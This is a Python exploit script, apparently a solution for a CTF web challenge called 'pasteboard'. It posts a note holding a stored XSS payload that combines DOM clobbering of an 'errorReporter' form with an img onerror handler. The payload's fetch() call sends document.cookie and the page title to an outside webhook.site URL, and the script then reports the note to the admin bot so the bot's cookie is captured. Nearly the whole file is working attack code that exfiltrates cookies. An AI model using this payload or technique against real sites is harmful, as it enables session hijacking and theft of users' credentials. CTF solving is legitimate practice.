import requests

BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# WINNING PAYLOAD: Same as test3 but grab document.cookie!
payload = '''<form id="errorReporter"><input name="path" value="data:text/javascript,fetch('https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/FLAG.js?cookie='+document.cookie+'&title='+document.title)"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''

print("[*] FINAL PAYLOAD - Getting document.cookie!")
print("[*] Using the EXACT method that worked for test3")
print()

session = requests.Session()
resp = session.post(
    BASE_URL + "/note/new",
    data={"title": "GET FLAG", "body": payload},
    allow_redirects=False
)

if resp.status_code == 302:
    location = resp.headers.get('Location')
    note_url = BASE_URL + location
    
    print(f"[+] Created: {note_url}")
    print()
    
    report = session.post(BASE_URL + "/report", data={"url": location})
    if report.status_code == 202:
        print(f"[+] Reported to bot!")
        print()
        print("[*] Check webhook in 30-40 seconds for:")
        print("    /FLAG.js?cookie=<THE_FLAG>&title=...")
        print()
        print("    https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")
        print()
        print("[!] THE FLAG SHOULD BE IN THE 'cookie' QUERY PARAMETER!")
    else:
        print(f"[-] Report failed")
else:
    print(f"[-] Failed: {resp.status_code}")